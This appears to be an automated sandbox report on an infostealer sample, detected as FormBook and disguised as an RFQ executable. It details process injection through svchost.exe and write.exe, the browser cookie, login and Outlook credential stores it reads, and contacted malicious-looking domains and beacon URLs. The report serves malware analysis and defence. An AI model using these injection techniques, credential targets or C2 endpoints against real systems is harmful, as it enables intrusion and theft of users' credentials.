            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\write.exeThread register set: target process: 2104Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\write.exeThread APC queued: target process: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EE8008Jump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe"Jump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: RFQ - HTS45785-24-0907I000.exe, TNPukQnytLH.exe, 00000005.00000002.4161281149.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000000.2093542011.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161544199.0000000000E70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: TNPukQnytLH.exe, 00000005.00000002.4161281149.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000000.2093542011.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161544199.0000000000E70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: TNPukQnytLH.exe, 00000005.00000002.4161281149.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000000.2093542011.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161544199.0000000000E70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: TNPukQnytLH.exe, 00000005.00000002.4161281149.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000000.2093542011.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161544199.0000000000E70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: RFQ - HTS45785-24-0907I000.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: RFQ - HTS45785-24-0907I000.exeBinary or memory string: WIN_XP
            Source: RFQ - HTS45785-24-0907I000.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: RFQ - HTS45785-24-0907I000.exeBinary or memory string: WIN_XPe
            Source: RFQ - HTS45785-24-0907I000.exeBinary or memory string: WIN_VISTA
            Source: RFQ - HTS45785-24-0907I000.exeBinary or memory string: WIN_7
            Source: RFQ - HTS45785-24-0907I000.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1517661 Sample: RFQ - HTS45785-24-0907I000.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 28 www.suarahati20.xyz 2->28 30 www.broomeorchard.xyz 2->30 32 21 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 7 other signatures 2->50 10 RFQ - HTS45785-24-0907I000.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 TNPukQnytLH.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 write.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 TNPukQnytLH.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.broomeorchard.xyz 15.197.204.56, 49774, 49775, 49776 TANDEMUS United States 22->34 36 www.93187.xyz 107.163.130.249, 49754, 49755, 49756 TAKE2US United States 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            RFQ - HTS45785-24-0907I000.exe24%ReversingLabs
            RFQ - HTS45785-24-0907I000.exe26%VirustotalBrowse
            RFQ - HTS45785-24-0907I000.exe100%AviraHEUR/AGEN.1321671
            RFQ - HTS45785-24-0907I000.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.nmh6.site/8qne/0%Avira URL Cloudsafe
            http://www.52ywq.vip/4i87/?Vvn=XtJLE6KXyHJ010P&N0spilI0=tX1gPPm4vGDAfdGczrVeX+gm8LhLY0HdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVsboGl1wez7JIRLBvFWiGcrLzlWcfeTA45w8=0%Avira URL Cloudsafe
            http://tempatmudisini01.click/abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqs100%Avira URL Cloudmalware
            http://www.zenscape.top/d8cw/?N0spilI0=ygF20N1+ik7kBOtGb3g4TwN9wkqIIRiR8XEst5j0lvkfFXMCnxh1w4hdkVa8euGiR7K2W9wNoXO2NDH8py5ookWv7InHpo4AkD1QDiauZEraAIYQUMRDKnI=&Vvn=XtJLE6KXyHJ010P0%Avira URL Cloudsafe
            http://www.nmh6.site0%Avira URL Cloudsafe
            http://www.tempatmudisini01.click/abla/100%Avira URL Cloudmalware
            http://www.tempatmudisini01.click/abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIK8HYayGHDu+DpDN+18WI9ctL3WRi2TK2Q5c=&Vvn=XtJLE6KXyHJ010P100%Avira URL Cloudmalware
            http://www.suarahati20.xyz/4est/0%Avira URL Cloudsafe
            http://www.1183377.app/8z5k/0%Avira URL Cloudsafe
            https://6329.vhjhbv.com/4i87/?Vvn=XtJLE6KXyHJ010P&N0spilI0=tX1gPPm4vGDAfdGczrVeX0%Avira URL Cloudsafe
            http://www.broomeorchard.xyz/8o1o/0%Avira URL Cloudsafe
            http://www.insicilia.today/2fpq/0%Avira URL Cloudsafe
            http://www.52ywq.vip/4i87/0%Avira URL Cloudsafe
            http://www.suarahati20.xyz/4est/?N0spilI0=6TioOITzTznuWaHFY2nP+M5OXgMojRQqdx+6cQbbG9CbTHyFxDml283eSUfpT4rPWLRehJ5KDSFFDUFbTukXgac9EFud27M13v05UDH3lX7bp5CeFPtRd9M=&Vvn=XtJLE6KXyHJ010P0%Avira URL Cloudsafe
            http://www.nmh6.site/8qne/?N0spilI0=KTDLAip6979182Yus4gak8cu0ouPK1SjRu9dlBr1KRF7u6Oe/Vup1PLCUBiG85sopIJcMB3IBfxfJF1E2Fdc2yH6m+FOGHStPZpUzCEofUPNgN9qGZfSYG8=&Vvn=XtJLE6KXyHJ010P0%Avira URL Cloudsafe
            http://www.consultarfacil.online/2ho9/?N0spilI0=sZDoihg8ajsFNu4rJh4aU/u18lT0jTMSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3C72rBIAnGZtnn+XzJEmDgEkU4cQofgEFxbM=&Vvn=XtJLE6KXyHJ010P0%Avira URL Cloudsafe
            http://www.broomeorchard.xyz/8o1o/?N0spilI0=QunhVm6kZFQCJjGjii7PtVl4QBOBSEhunS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjW/EB0lpOjo9F2+iOt7QfZRjcLyTCi7EuLmU=&Vvn=XtJLE6KXyHJ010P0%Avira URL Cloudsafe
            http://www.93187.xyz/jyeu/?N0spilI0=KiLVsdjbhLGFnrJZtqTZThcLgxZgRsnLJ+iUpFrqUMB7t1Dgy4rxQKgK0ZJ2vypsgoxK5tfcGeo5lfiWWTY36SvGriSEhjCZh1puMp4IzR/yG5rFUDO3WkY=&Vvn=XtJLE6KXyHJ010P0%Avira URL Cloudsafe
            http://www.insicilia.today/2fpq/?Vvn=XtJLE6KXyHJ010P&N0spilI0=Kb/tSpzo2Dwy8QCik2PCr8/dlP2bBJ+jv+ep1kI5jCwuscQQek2bWkoiPh5FTvH+ji2zFJaVeezPpoGajJ7KnUaOWGTJ/qpny8WUA+svitDcwEORStRuN1w=0%Avira URL Cloudsafe
            http://www.o731lh.vip/xweg/?Vvn=XtJLE6KXyHJ010P&N0spilI0=zyGgAOIUWHAkjy5wbuax0/FfUf3h0NwJaxZIhC+JlO6DnbZYVfn3Wlg6Cuq4vonK+0ubeBxTnsDOaX+bBTk8Y+Ai5wuik0xspH+a6MWSZLxuSkFH9/b6rws=0%Avira URL Cloudsafe
            http://www.consultarfacil.online/2ho9/0%Avira URL Cloudsafe
            http://www.o731lh.vip/xweg/0%Avira URL Cloudsafe
            http://www.93187.xyz/jyeu/0%Avira URL Cloudsafe
            http://www.asociacia.online/jsqu/0%Avira URL Cloudsafe
            http://www.asociacia.online/jsqu/?Vvn=XtJLE6KXyHJ010P&N0spilI0=j6JGavFFAQYaoSsj7sdzjfOI2Rr+bAZS/zrFTn0tpA7YEGIVc6EsUszyewNJDeJ1aRTf+dmReaRifudBLpLuFGiuWviWU248lx4BGGAWHhQeP+58vPv3y+I=0%Avira URL Cloudsafe
            http://www.zenscape.top/d8cw/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.nmh6.site
